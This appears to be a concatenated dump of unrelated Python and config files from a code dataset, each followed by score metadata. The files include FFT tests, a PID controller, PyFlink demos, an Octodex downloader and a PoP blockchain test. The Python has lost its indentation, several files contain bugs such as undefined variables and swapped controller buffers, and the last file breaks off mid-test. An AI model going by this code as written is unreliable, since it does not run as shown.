dtype_tuple = self.io_dtypes[functions[self.func]]
test_shape = (16,)
for dtype in dtype_tuple[0]:
s = None
if self.axes_kw == 'axis':
kwargs = {'axis': -1}
else:
kwargs = {'axes': (-1,)}
self.check_arg('threads', (1, 2, 5, 10),
dtype_tuple[1], test_shape, dtype, s, kwargs)
kwargs['threads'] = 'bleh'
# Should not work
self.assertRaises(TypeError,
self.validate,
*(dtype_tuple[1], test_shape, dtype, s, kwargs))
def test_overwrite_input(self):
'''Test the overwrite_input flag
'''
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, _kwargs in self.test_data:
s = None
kwargs = _kwargs.copy()
self.validate(dtype_tuple[1], test_shape, dtype, s, kwargs)
self.check_arg(self.overwrite_input_flag, (True, False),
dtype_tuple[1], test_shape, dtype, s, kwargs)
def test_input_maintained(self):
'''Test to make sure the input is maintained by default.
'''
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
input_array = dtype_tuple[1](test_shape, dtype)
orig_input_array = input_array.copy()
getattr(self.test_interface, self.func)(
input_array, s, **kwargs)
self.assertTrue(
numpy.alltrue(input_array == orig_input_array))
class InterfacesNumpyFFTTestIFFT(InterfacesNumpyFFTTestFFT):
func = 'ifft'
class InterfacesNumpyFFTTestRFFT(InterfacesNumpyFFTTestFFT):
func = 'rfft'
class InterfacesNumpyFFTTestIRFFT(InterfacesNumpyFFTTestFFT):
func = 'irfft'
realinv = True
class InterfacesNumpyFFTTestHFFT(InterfacesNumpyFFTTestFFT):
func = 'hfft'
realinv = True
class InterfacesNumpyFFTTestIHFFT(InterfacesNumpyFFTTestFFT):
func = 'ihfft'
class InterfacesNumpyFFTTestFFT2(InterfacesNumpyFFTTestFFT):
axes_kw = 'axes'
func = 'ifft2'
test_shapes = (
((128, 64), {'axes': None}),
((128, 32), {'axes': None}),
((128, 32, 4), {'axes': (0, 2)}),
((59, 100), {'axes': (-2, -1)}),
((64, 128, 16), {'axes': (0, 2)}),
((4, 6, 8, 4), {'axes': (0, 3)}),
)
invalid_args = (
((100,), ((100, 200),), ValueError, 'Shape error'),
((100, 200), ((100, 200, 100),), ValueError, 'Shape error'),
((100,), ((100, 200), (-3, -2, -1)), ValueError, 'Shape error'),
((100, 200), (100, -1), TypeError, ''),
((100, 200), ((100, 200), (-3, -2)), IndexError, 'Invalid axes'),
((100, 200), ((100,), (-3,)), IndexError, 'Invalid axes'))
def test_shape_and_s_different_lengths(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, _kwargs in self.test_data:
kwargs = copy.copy(_kwargs)
try:
s = s[1:]
except TypeError:
self.skipTest('Not meaningful test on 1d arrays.')
del kwargs['axes']
self.validate(dtype_tuple[1],
test_shape, dtype, s, kwargs)
class InterfacesNumpyFFTTestIFFT2(InterfacesNumpyFFTTestFFT2):
func = 'ifft2'
class InterfacesNumpyFFTTestRFFT2(InterfacesNumpyFFTTestFFT2):
func = 'rfft2'
class InterfacesNumpyFFTTestIRFFT2(InterfacesNumpyFFTTestFFT2):
func = 'irfft2'
realinv = True
class InterfacesNumpyFFTTestFFTN(InterfacesNumpyFFTTestFFT2):
func = 'ifftn'
test_shapes = (
((128, 32, 4), {'axes': None}),
((64, 128, 16), {'axes': (0, 1, 2)}),
((4, 6, 8, 4), {'axes': (0, 3, 1)}),
((4, 6, 8, 4), {'axes': (0, 3, 1, 2)}),
)
class InterfacesNumpyFFTTestIFFTN(InterfacesNumpyFFTTestFFTN):
func = 'ifftn'
class InterfacesNumpyFFTTestRFFTN(InterfacesNumpyFFTTestFFTN):
func = 'rfftn'
class InterfacesNumpyFFTTestIRFFTN(InterfacesNumpyFFTTestFFTN):
func = 'irfftn'
realinv = True
test_cases = (
InterfacesNumpyFFTTestModule,
InterfacesNumpyFFTTestFFT,
InterfacesNumpyFFTTestIFFT,
InterfacesNumpyFFTTestRFFT,
InterfacesNumpyFFTTestIRFFT,
InterfacesNumpyFFTTestHFFT,
InterfacesNumpyFFTTestIHFFT,
InterfacesNumpyFFTTestFFT2,
InterfacesNumpyFFTTestIFFT2,
InterfacesNumpyFFTTestRFFT2,
InterfacesNumpyFFTTestIRFFT2,
InterfacesNumpyFFTTestFFTN,
InterfacesNumpyFFTTestIFFTN,
InterfacesNumpyFFTTestRFFTN,
InterfacesNumpyFFTTestIRFFTN,)
#test_set = {'InterfacesNumpyFFTTestHFFT': ('test_valid',)}
test_set = None
if __name__ == '__main__':
run_test_suites(test_cases, test_set)
| 1.304688 | 1 |
qs-engine/settings.py | kirte2849/Quickspy | 1 | 12769968 | ###Database
#database typy Option:(mongodb, mysql, redis)
DB_TYPE = 'mongdb'
#database ip
DB_HOST = 'localhost'
#database port
DB_PORT = '1'
#username
#USERNAME = None
#passward
#PASSWARD = None
#database name
DB_DBNAME = 'quickspy'
###
| 1.632813 | 2 |
dnn_biot/test_dnn_biot.py | AasmundResell/FEniCS-Brain-Flow | 0 | 12769969 | from fenics import *
from matplotlib.pyplot import show
from dolfin_adjoint import *
from ufl_dnn.neural_network import ANN
class BoundaryOuter(SubDomain):
def inside(self, x, on_boundary):
return on_boundary
def a_u(u, v):
return my * (inner(grad(u), grad(v)) + inner(grad(u), nabla_grad(v))) * dx
def a_p(K, p, q):
return K * dot(grad(p), grad(q)) * dx
def b(s, v):
return s * div(v) * dx
def c(alpha, p, q):
return alpha / Lambda * dot(p, q) * dx
def F(f, v):
return dot(f, v) * dx
def test_SteadyBiot_dnn():
import sympy as sym
x, y = sym.symbols("x[0], x[1]")
my = 1 / 3
Lambda = 16666
alpha = 1.0
c = 1.0
K = 1.0
u = (
sym.sin(2 * sym.pi * y) * (-1 + sym.cos(2 * sym.pi * x))
+ 1 / (my + Lambda) * sym.sin(sym.pi * x) * sym.sin(sym.pi * y)
)
v = (
sym.sin(2 * sym.pi * x) * (1 - sym.cos(2 * sym.pi * y))
+ 1 / (my + Lambda) * sym.sin(sym.pi * x) * sym.sin(sym.pi * y)
)
p1 = -1 * sym.sin(sym.pi * x) * sym.sin(sym.pi * y) # p Network1
p0 = Lambda * (sym.diff(u, x, 1) + sym.diff(v, y, 1)) - alpha * p1
fx,fy = 0.0,0.0 #force term
g_ex = -K * (sym.diff(p1, x, 2) + sym.diff(p1, y, 2))
variables = [
u,
v,
p0,
p1,
my,
Lambda,
alpha,
c,
K,
fx,
fy,
g_ex,
]
variables = [sym.printing.ccode(var) for var in variables] # Generate C++ code
UFLvariables = [Expression(var, degree=2) for var in variables]
(
u,
v,
p0,
p1,
my,
Lambda,
alpha,
c,
K,
fx,
fy,
g_ex,
) = UFLvariables
f = as_vector((fx, fy))
mesh = UnitSquareMesh(10, 10)
g = [g_ex]
alpha = [1, alpha]
c = [c]
K = [K]
# Generate function space
V = VectorElement("CG", triangle, 2) # Displacement
Q_0 = FiniteElement("CG", triangle, 1) # Total pressure
Q_1 = FiniteElement("CG", triangle, 1) #Network 1
mixedElement = []
mixedElement.append(V)
mixedElement.append(Q_0)
mixedElement.append(Q_1)
W_element = MixedElement(mixedElement)
W = FunctionSpace(mesh, W_element)
test = TestFunction(W)
q = split(test) # q[0] = v, q[1],q[2],... = q_0,q_1,...
trial = TrialFunction(W)
p_ = split(trial) # p_[0] = u_, p_[1],p_[2],... = p_0,p_1,...
up_n = Function(W)
p_n = split(up_n) # p_n[0] = u_n, p_n[1],p_n[2],... = p0_n,p1_n,...
# variational formulation
sources = [] # Contains the source term for each network
innerProdP = (
[]
) # Contains the inner product of the gradient of p_j for each network
dotProdP = [] # Contains the dot product of alpha_j & p_j,
bcs_D = [] # Contains the terms for the Dirichlet boundaries
integrals_N = [] # Contains the integrals for the Neumann boundaries
x, y = SpatialCoordinate(mesh)
layers = [4, 10, 1]
g_ex = project(g_ex, V)
obs = project(u_ex, V)
plot(g_ex)
show()
bias = [True, True]
x, y = SpatialCoordinate(mesh)
net = ANN(layers, bias=bias, mesh=mesh)
E = K * inner(grad(u), grad(v)) * dx + net(x, y) * v * dx
bcs = DirichletBC(V, Constant(0.0), "on_boundary")
hat_u = Function(V)
# Solve PDE
solve(lhs(E) == rhs(E), hat_u, bcs)
# L ^ 2 error as loss
loss = assemble((hat_u - obs) ** 2 * dx) # Loss funtction
# Define reduced formulation of problem
hat_loss = ReducedFunctional(loss, net.weights_ctrls())
# Use scipy L - BFGS optimiser
opt_theta = minimize(
hat_loss, options={"disp": True, "gtol": 1e-12, "ftol": 1e-12, "maxiter": 80}
)
net.set_weights(opt_theta)
#assert assemble(net(x, y) ** 2 * dx) < 1e-6
# u_test = Function(V)
# E_test = K * inner(grad(u), grad(v)) * dx + net(x, y) * v * dx
# solve(lhs(E_test) == rhs(E_test),u_test,bcs)
# f_pred = project(net(x,y),W.sub(2))
# plot(f_pred)
# show()
# plot(u_test)
# show()
u_e = Expression((variables[0], variables[1]), degree=2)
V_e = VectorFunctionSpace(mesh, "P", 2)
Q_e = FunctionSpace(mesh, "P", 1)
u_e = project(u_e, V_e)
p_e1 = project(UFLvariables[3], Q_e)
vtkUfile = File("solution_steady/u.pvd")
vtkPfile = File("solution_steady/p1.pvd")
vtkUfile << u
vtkPfile << p[1]
vtkUEfile = File("solution_steady/u_e.pvd")
vtkPEfile = File("solution_steady/p_e1.pvd")
vtkUEfile << u_e
vtkPEfile << p_e1
er2U = errornorm(u_e, u, "L2")
print("Error L2 for velocity = ", er2U)
er2P = errornorm(p_e1, p[1], "L2")
print("Error L2 for pressure = ", er2P)
plot(p[1])
show()
if __name__ == "__main__":
test_SteadyBiot_dnn()
| 2.609375 | 3 |
knowledge_extractor/pipeline.py | janez87/social-knowledge-extractor | 5 | 12769970 | <reponame>janez87/social-knowledge-extractor<filename>knowledge_extractor/pipeline.py
import pprint
import pandas as pd
import collections
from scipy.spatial.distance import cosine
from .strategies.AST import AST
from .strategies.EHE import EHE
from flask import current_app
class Pipeline:
def createSpace(self,seeds):
print("Creating the vector space")
space = []
for k,v in seeds.items():
space += v
space = set(space)
return space
def createFeatureVector(self,space,data):
vector = {}
for k,v in data.items():
c = collections.Counter(v)
for s in space:
if s not in vector:
vector[s] = {}
vector[s][k] = c[s]
return pd.DataFrame(vector)
def getSeeds(self):
query = {"id_experiment":self.experiment_id, "starting":True, "hub":False}
return self.db.getSeeds(query)
def getCandidates(self):
query = {"id_experiment":self.experiment_id, "starting":False, "hub":False}
return self.db.getCandidates(query)
def computeSeedVectors(self,seeds):
mentions = {}
ast_mentions = {}
ehe = EHE(self.db,self.expertFile)
ast = AST(self.db,self.expertFile)
for seed in seeds:
#computer array of mentioned entity
pprint.pprint(seed)
mentions[seed["handle"]] = ehe.getEntities(seed)
ast_mentions[seed["handle"]] = ast.getEntities(seed)
pprint.pprint(ast_mentions)
space_ehe = self.createSpace(mentions)
space_ast = self.createSpace(ast_mentions)
print("Creating feature vector for the seed")
seed_feature_vectors_ast = self.createFeatureVector(space_ast,ast_mentions)*(1-self.alfa)
#self.db.store_feature_ast_vector(seed_feature_vectors_ast,self.experiment_id)
seed_feature_vectors_ast = seed_feature_vectors_ast*(1-self.alfa)
seed_feature_vectors_ehe = self.createFeatureVector(space_ehe,mentions)*self.alfa
seed_feature_vectors = seed_feature_vectors_ast.join(seed_feature_vectors_ehe)
return {
"fv":seed_feature_vectors,
"space_ehe":space_ehe,
"space_ast":space_ast
}
def createCentroid(self,seeds):
return seeds.mean()
def computeCandidatesVectors(self,cands,space_ast,space_ehe):
mentions = {}
ast_mentions = {}
ehe = EHE(self.db,self.expertFile)
ast = AST(self.db,self.expertFile)
for cand in cands:
#computer array of mentioned entity
print("Getting mentions for candidate " + cand["handle"])
mentions[cand["handle"]] = ehe.getEntities(cand)
ast_mentions[cand["handle"]] = ast.getEntities(cand)
print("Creating feature vector for the candidates")
cands_feature_vectors_ast = self.createFeatureVector(space_ast,ast_mentions)*(1-self.alfa)
cands_feature_vectors_ehe = self.createFeatureVector(space_ehe,mentions)*self.alfa
cands_feature_vectors = cands_feature_vectors_ast.join(cands_feature_vectors_ehe)
return cands_feature_vectors
def run(self):
feature_vectors = {}
seeds = self.getSeeds()
candidates = self.getCandidates()
print("Computing seeds fv")
seeds_components = self.computeSeedVectors(seeds)
feature_vectors["seeds"] = seeds_components["fv"]
print("Computing candidates fv")
pprint.pprint(seeds_components["fv"])
feature_vectors["candidates"] = self.computeCandidatesVectors(candidates,seeds_components["space_ast"],seeds_components["space_ehe"])
centroid = self.createCentroid(feature_vectors["seeds"])
centroid = centroid.values
scores = feature_vectors["candidates"].apply(lambda row: 1-cosine(row,centroid),axis=1)
print("Saving the rankings")
self.db.saveScores(scores,self.experiment_id)
return scores
def __init__(self,db,experiment_id):
self.alfa=0.7
self.db=db
self.experiment_id = experiment_id
self.expertFile = self.db.getExpertTypes(experiment_id)
if __name__ == "__main__":
import mongo_manager
import configuration
from bson import ObjectId
db_manager = mongo_manager.MongoManager(configuration.db_name)
kn = Pipeline(db_manager, ObjectId('594142ebd576065c263fc798'))
kn.run()
| 2.453125 | 2 |
apps/external_apps/swaps/admin.py | indro/t2c | 3 | 12769971 | <filename>apps/external_apps/swaps/admin.py
from django.contrib import admin
from swaps.models import Offer, Swap
class OfferAdmin(admin.ModelAdmin):
list_display = ('offerer', 'short_description', 'offering', 'want', 'state', 'swapped_by')
list_filter = ('offerer', 'state')
search_fields = ('short_description', 'offering', 'want')
admin.site.register(Offer, OfferAdmin)
class SwapAdmin(admin.ModelAdmin):
list_display = ('proposing_offer', 'responding_offer', 'state', 'conflicted_by')
list_filter = ('state',)
admin.site.register(Swap, SwapAdmin) | 1.703125 | 2 |
py/skr/commands/cmd_octodex.py | er1iang/awesome-pyscript | 3 | 12769972 | import click
import logging
import os
import requests
import xml.etree.ElementTree as ET
from multiprocessing.dummy import Pool
class OctocatsDownloader:
feeds_url = "http://feeds.feedburner.com/Octocats"
def __init__(self, output="octocats", max_threads=5, force=False, logger=None):
if not os.path.exists(output):
os.mkdir(output)
self.output = output
self.session = requests.Session()
self.pool = Pool(max_threads)
self.force = force
self.skip_count = 0
self.update_count = 0
self.feeds = None
self.logger = logger or logging.getLogger()
def join_path(self, path):
return os.path.join(self.output, path)
def download_job(self, img_element):
src = img_element.get("src")
filename = src.rsplit("/", 1)[-1]
path = self.join_path(filename)
if not self.force and os.path.exists(path):
self.skip_count += 1
self.logger.info("%s already exists! skip downloading ...", filename)
return
img = self.session.get(src).content
with click.open_file(path, "wb") as fp:
fp.write(img)
self.update_count += 1
self.logger.info("%s successfully downloaded.", filename)
def fetch_feeds(self):
self.logger.info("fetching RSS feeds ...")
response = self.session.get(self.feeds_url)
with click.open_file(self.join_path("Octocats.xml"), "w") as fp:
fp.write(response.text)
self.feeds = ET.fromstring(response.text)
return self.feeds
def download(self):
feeds = self.feeds or self.fetch_feeds()
# http://www.w3school.com.cn/xml/xml_namespaces.asp
img_elements = feeds.iterfind(
".//atom:entry/atom:content/atom:div/atom:a/atom:img",
{"atom": "http://www.w3.org/2005/Atom"},
)
self.logger.info("dispatching download jobs ...")
self.pool.map(self.download_job, img_elements)
self.logger.info(
"all task done, %d updated, %d skipped, enjoy!",
self.update_count,
self.skip_count,
)
@click.command()
@click.pass_context
@click.option(
"-o",
"--output",
type=click.Path(file_okay=False, writable=True),
default="octocats",
help="The directory to save images.",
)
@click.option(
"-m",
"--max-threads",
type=click.IntRange(1, 10),
default=5,
help="Max number of thread pool to download image.",
)
@click.option("-p", "--proxy", type=str, help="HTTP Proxy")
@click.option(
"-f", "--force", is_flag=True, help="Fore download images even they exists."
)
def cli(ctx, output, max_threads, proxy, force):
"""
Download Octocats from https://octodex.github.com
"""
o = OctocatsDownloader(output, max_threads, force, logger=ctx.obj.logger)
if proxy:
o.session.proxies = {"http": proxy}
o.download()
| 2.546875 | 3 |
bigdata_study/pyflink1.x/core/table_operator.py | kingreatwill/penter | 13 | 12769973 | from pyflink.table import *
from pyflink.table.expressions import col, lit, concat
from pyflink.table.window import Tumble
def demo01():
# environment configuration
t_env = BatchTableEnvironment.create(environment_settings=EnvironmentSettings.new_instance().in_batch_mode().use_blink_planner().build())
# register Orders table and Result table sink in table environment
source_data_path = "/path/to/source/directory/"
result_data_path = "/path/to/result/directory/"
source_ddl = f"""
create table Orders(
a VARCHAR,
b BIGINT,
c BIGINT,
rowtime TIMESTAMP(3),
WATERMARK FOR rowtime AS rowtime - INTERVAL '1' SECOND
) with (
'connector' = 'filesystem',
'format' = 'csv',
'path' = '{source_data_path}'
)
"""
t_env.execute_sql(source_ddl)
sink_ddl = f"""
create table `Result`(
a VARCHAR,
cnt BIGINT
) with (
'connector' = 'filesystem',
'format' = 'csv',
'path' = '{result_data_path}'
)
"""
t_env.execute_sql(sink_ddl)
# specify table program
orders = t_env.from_path("Orders") # schema (a, b, c, rowtime)
orders.group_by("a").select(orders.a, orders.b.count.alias('cnt')).execute_insert("result").wait()
orders.where(orders.a == 'red')
orders.filter(orders.b % 2 == 0)
orders.add_columns(concat(orders.c, 'sunny'))
orders.add_or_replace_columns(concat(orders.c, 'sunny').alias('desc'))
orders.drop_columns(orders.b, orders.c)
orders.rename_columns(orders.b.alias('b2'), orders.c.alias('c2'))
orders.group_by(orders.a).select(orders.a, orders.b.sum.alias('d'))
# tab.group_by(tab.key).select(tab.key, tab.value.avg.alias('average'))
# tab.group_by("key").select("key, value.avg as average")
result = orders.filter(orders.a.is_not_null & orders.b.is_not_null & orders.c.is_not_null) \
.select(orders.a.lower_case.alias('a'), orders.b, orders.rowtime) \
.window(Tumble.over(lit(1).hour).on(orders.rowtime).alias("hourly_window")) \
.group_by(col('hourly_window'), col('a')) \
.select(col('a'), col('hourly_window').end.alias('hour'), col('b').avg.alias('avg_billing_amount'))
"""
SELECT user, SUM(amount)
FROM Orders
GROUP BY TUMBLE(rowtime, INTERVAL '1' DAY), user
"""
# SQL内置函数:https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/table/functions/systemFunctions.html
# SQL Data类型:https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/table/types.html
# table operator对应的sql:https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/table/sql/queries.html
# 各种Window 写法;https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/table/tableApi.html#group-windows
# https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/table/tableApi.html
# https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/python/table-api-users-guide/operations.html
if __name__ == '__main__':
demo01() | 2.375 | 2 |
Module/startingInventory.py | 1234567890num/KH2Randomizer | 7 | 12769974 | from Class.locationClass import KH2StartingItem
class StartingInventory:
def generateStartingInventory(inventory, itemsToAdd):
for item in itemsToAdd:
inventory.setReward(int(item))
def getOptions():
return {
"moduleName": "Sora's Starting Inventory",
"options":{
"Abilities": [
{138: "Scan"},
{404: "No Experience"},
{158: "Aerial Recovery"},
{82: "Guard"}
],
"Items": [
{537: "Hades Cup Trophy"},
{369: "Membership Card"}
],
"Proofs": [
{593: "Proof of Connection"},
{594: "Proof of Nonexistence"},
{595: "Proof of Peace"},
{524: "Promise Charm"}
]
}
}
def getIdConverter():
return {
'138':"Scan",
'537':"Hades Cup Trophy",
'369':"Membership Card",
'404':"No Experience",
'158':"Aerial Recovery",
'82':"Guard",
'593':"Proof of Connection",
'594':"Proof of Nonexistence",
'595':"Proof of Peace",
'524':"Promise Charm"
} | 2.875 | 3 |
opencda/core/actuation/pid_controller.py | xiaxin2000/OpenCDA-Documents | 1 | 12769975 | # -*- coding: utf-8 -*-
"""
PID Control Class
"""
# Author: <NAME> <<EMAIL>>
# License: MIT
from collections import deque
import math
import numpy as np
import carla
class Controller:
"""
PID Controller implementation.
Parameters
----------
args : dict
The configuration dictionary parsed from yaml file.
Attributes
----------
_lon_ebuffer : deque
A deque buffer that stores longitudinal control errors.
_lat_ebuffer : deque
A deque buffer that stores latitudinal control errors.
current_transform : carla.transform
Current ego vehicle transformation in CARLA world.
current_speed : float
Current ego vehicle speed.
past_steering : float
Sterring angle from previous control step.
"""
def __init__(self, args):
# longitudinal related
self.max_brake = args['max_brake']
self.max_throttle = args['max_throttle']
self._lon_k_p = args['lon']['k_p']
self._lon_k_d = args['lon']['k_d']
self._lon_k_i = args['lon']['k_i']
self._lon_ebuffer = deque(maxlen=10)
# lateral related
self.max_steering = args['max_steering']
self._lat_k_p = args['lat']['k_p']
self._lat_k_d = args['lat']['k_d']
self._lat_k_i = args['lat']['k_i']
self._lat_ebuffer = deque(maxlen=10)
# simulation time-step
self.dt = args['dt']
# current speed and localization retrieved from sensing layer
self.current_transform = None
self.current_speed = 0.
# past steering
self.past_steering = 0.
self.dynamic = args['dynamic']
def dynamic_pid(self):
"""
Compute kp, kd, ki based on current speed.
"""
pass
def update_info(self, ego_pos, ego_spd):
"""
Update ego position and speed to controller.
Parameters
----------
ego_pos : carla.location
Position of the ego vehicle.
ego_spd : float
Speed of the ego vehicle
Returns
-------
"""
self.current_transform = ego_pos
self.current_speed = ego_spd
if self.dynamic:
self.dynamic_pid()
def lon_run_step(self, target_speed):
"""
Parameters
----------
target_speed : float
Target speed of the ego vehicle.
Returns
-------
acceleration : float
Desired acceleration value for the current step
to achieve target speed.
"""
error = target_speed - self.current_speed
self._lat_ebuffer.append(error)
if len(self._lat_ebuffer) >= 2:
_de = (self._lat_ebuffer[-1] - self._lat_ebuffer[-2]) / self.dt
_ie = sum(self._lat_ebuffer) * self.dt
else:
_de = 0.0
_ie = 0.0
return np.clip((self._lat_k_p * error) +
(self._lat_k_d * _de) +
(self._lat_k_i * _ie),
-1.0, 1.0)
"""
Generate the throttle command based on current speed and target speed
Args:
-target_location (carla.loaction): Target location.
Returns:
-current_steering (float): Desired steering angle value
for the current step to achieve target location.
"""
def lat_run_step(self, target_location):
"""
Generate the throttle command based on current speed and target speed
Parameters
----------
target_location : carla.location
Target location.
Returns
-------
current_steering : float
Desired steering angle value for the current step to
achieve target location.
"""
v_begin = self.current_transform.location
v_end = v_begin + carla.Location(
x=math.cos(
math.radians(
self.current_transform.rotation.yaw)), y=math.sin(
math.radians(
self.current_transform.rotation.yaw)))
v_vec = np.array([v_end.x - v_begin.x, v_end.y - v_begin.y, 0.0])
w_vec = np.array([target_location.x -
v_begin.x, target_location.y -
v_begin.y, 0.0])
_dot = math.acos(np.clip(np.dot(
w_vec, v_vec) / (np.linalg.norm(w_vec) * np.linalg.norm(v_vec)),
-1.0, 1.0))
_cross = np.cross(v_vec, w_vec)
if _cross[2] < 0:
_dot *= -1.0
self._lon_ebuffer.append(_dot)
if len(self._lon_ebuffer) >= 2:
_de = (self._lon_ebuffer[-1] - self._lon_ebuffer[-2]) / self.dt
_ie = sum(self._lon_ebuffer) * self.dt
else:
_de = 0.0
_ie = 0.0
return np.clip((self._lat_k_p * _dot) + (self._lat_k_d *
_de) + (self._lat_k_i * _ie), -1.0, 1.0)
def run_step(self, target_speed, waypoint):
"""
Execute one step of control invoking both lateral and longitudinal
PID controllers to reach a target waypoint at a given target_speed.
Parameters
----------
target_speed : float
Target speed of the ego vehicle.
waypoint : carla.loaction
Target location.
Returns
-------
control : carla.VehicleControl
Desired vehicle control command for the current step.
"""
# control class for carla vehicle
control = carla.VehicleControl()
# emergency stop
if target_speed == 0 or waypoint is None:
control.steer = 0.0
control.throttle = 0.0
control.brake = 1.0
control.hand_brake = False
return control
acceleration = self.lon_run_step(target_speed)
current_steering = self.lat_run_step(waypoint)
if acceleration >= 0.0:
control.throttle = min(acceleration, self.max_throttle)
control.brake = 0.0
else:
control.throttle = 0.0
control.brake = min(abs(acceleration), self.max_brake)
# Steering regulation: changes cannot happen abruptly, can't steer too
# much.
if current_steering > self.past_steering + 0.2:
current_steering = self.past_steering + 0.2
elif current_steering < self.past_steering - 0.2:
current_steering = self.past_steering - 0.2
if current_steering >= 0:
steering = min(self.max_steering, current_steering)
else:
steering = max(-self.max_steering, current_steering)
control.steer = steering
control.hand_brake = False
control.manual_gear_shift = False
self.past_steering = steering
return control
| 3.03125 | 3 |
fedlab_benchmarks/feature-skew-fedavg/models.py | KarhouTam/FedLab-benchmarks | 46 | 12769976 | <gh_stars>10-100
import torch
import torch.nn as nn
import torch.nn.functional as F
"""
Code below is from NIID-bench official code:
https://github.com/Xtra-Computing/NIID-Bench
"""
class SimpleCNNMNIST(nn.Module):
def __init__(self, input_dim, hidden_dims, output_dim=10):
super(SimpleCNNMNIST, self).__init__()
self.conv1 = nn.Conv2d(1, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
# for now, we hard coded this network
# i.e. we fix the number of hidden layers i.e. 2 layers
self.fc1 = nn.Linear(input_dim, hidden_dims[0])
self.fc2 = nn.Linear(hidden_dims[0], hidden_dims[1])
self.fc3 = nn.Linear(hidden_dims[1], output_dim)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 4 * 4)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
| 3.046875 | 3 |
shop/forms.py | KWeselski/Shop-Django | 0 | 12769977 | <filename>shop/forms.py<gh_stars>0
from django import forms
class CouponForm(forms.Form):
code = forms.CharField(widget=forms.TextInput(attrs={
'class': 'form-control',
'placeholder': 'Promo code',
'aria-label': 'Recipient\'s username',
'aria-describedby': 'basic-addon2'
})) | 1.71875 | 2 |
prediction/FaceDetectMicroservice/secrets.py | anishapai/CombinedTechStack | 1 | 12769978 | <reponame>anishapai/CombinedTechStack
API_KEY = 'paste_your_api_key_here'
| 1 | 1 |
ATFGen/pida_types/tstr.py | goodwinxp/ida_info_code_gen | 1 | 12769979 | from abc_type import IdaTypes
from ida_types import IDA_TYPES
class IdaTStr(IdaTypes):
def __init__(self, ida_type=IDA_TYPES['str']):
self.ida_type = {'idt': ida_type, 'value': ''}
def decode(self, data):
count = ord(data[0])
offset = 1
for i in range(0, count):
import ida_decoder
rbyte, value = ida_decoder.decode_hybrid_type(ida_type=data[offset:])
offset += rbyte
self.ida_type['value'].append(value)
return offset
def get_type(self):
return self.ida_type
def to_string(self, session):
return self.ida_type['value'] + '{ptr} {name}'
def from_dict(self, data):
self.ida_type = data
| 2.375 | 2 |
hackerrank/contests/zenhacks/bob.py | spradeepv/dive-into-python | 0 | 12769980 | """
Problem Statement
Bob is in a candy shop and wants to purchase his favorite candy, which he knows costs N dollars. He has an infinite number of 1,2,5,10,20,50, and 100 dollar bills in his pocket. Bob wants to know the number of different ways he can pay the N dollars for his candy.
Input Format
A single integer, N, which is the cost of Bob's candy.
Constraint
1?N?250
Output Format
Print an integer representing the number of different variations of how Bob can pay.
Sample Input1
5
Sample Output1
4
Sample Input2
7
Sample Output2
6
Explanation
Sample 1: 4 variants
(1,1,1,1,1)
(2,1,1,1)
(2,2,1)
(5)
Sample 2: 6 variants
(1,1,1,1,1,1,1)
(2,1,1,1,1,1)
(2,2,1,1,1)
(2,2,2,1)
(5,1,1)
(5,2)
"""
def subset_sum(number, l):
ways = [0] * (number + 1)
ways[0] = 1
for n in l:
for j in xrange(n, number + 1):
ways[j] += ways[j - n]
return ways[number]
n = int(raw_input())
print subset_sum(n, [1, 2, 5, 10, 20, 50, 100])
| 3.796875 | 4 |
RecSearch/Tests/DataInterfaces/Splitters/Test_query.py | matthew-kimm/RecSearch | 0 | 12769981 | <filename>RecSearch/Tests/DataInterfaces/Splitters/Test_query.py
from RecSearch.DataInterfaces.Splitters.query import IXQuerySplit
from RecSearch.Tests.DataInterfaces.Splitters.SharedTestSplitter import SharedTestSplitter
import unittest
import pandas as pd
class TestQuerySplitter(SharedTestSplitter, unittest.TestCase):
def setUp(self):
self.Interface = IXQuerySplit()
self.data = pd.DataFrame(data=[['Math', 2017, 3.6],
['Computer Science', 2017, 3.8],
['English', 2019, 2.7],
['Math', 2018, 2.0],
['Art', 2018, 3.1],
['Engineering', 2017, 3.4]],
columns=['Department', 'Year', 'GPA'],
index=[0, 1, 2, 3, 4, 5])
self.data17 = self.data.loc[[0, 1, 5]]
self.data1819 = self.data.loc[[2, 3, 4]]
self.result = {'train': self.data17, 'test': self.data1819}
def test_interface(self):
self.assertTrue(self.compare_dict_dataframes(self.result,
self.Interface.iget_splitter(self.data,
**{'train': 'Year in [2017]',
'test': 'Year in [2018, 2019]'})))
| 2.609375 | 3 |
pypoptools/pypoptesting/tests/pop_e2e.py | black0rwhite/alt-integration-cpp | 0 | 12769982 | """
Test with multiple nodes, and multiple PoP endorsements, checking to make sure nodes stay in sync.
"""
import time
from ..framework.test_framework import PopIntegrationTestFramework
from ..framework.pop_util import endorse_block, mine_until_pop_enabled
from ..framework.sync_util import start_all, connect_all, sync_all
class PopE2E(PopIntegrationTestFramework):
def set_test_params(self):
self.num_nodes = 2
def setup_nodes(self):
start_all(self.nodes)
mine_until_pop_enabled(self.nodes[0])
connect_all(self.nodes)
sync_all(self.nodes)
def run_test(self):
from pypoptools.pypopminer import MockMiner, PublicationData
apm = MockMiner()
self._assert_nodes_peer_info()
vbk_blocks_amount = 100
self.log.info("generate vbk blocks on node0, amount {}".format(vbk_blocks_amount))
vbk_blocks = []
for i in range(vbk_blocks_amount):
vbk_blocks.append(apm.mineVbkBlocks(1))
assert len(vbk_blocks) == vbk_blocks_amount
vtbs_amount = 20
self.log.info("generate vtbs on node0, amount {}".format(vtbs_amount))
for i in range(vtbs_amount):
apm.endorseVbkBlock(apm.vbkTip, apm.btcTip.getHash(), 1)
self.nodes[0].generate(nblocks=10)
last_block = self.nodes[0].getblockcount()
assert last_block >= 5
self.log.info("endorse {} alt block".format(last_block - 5))
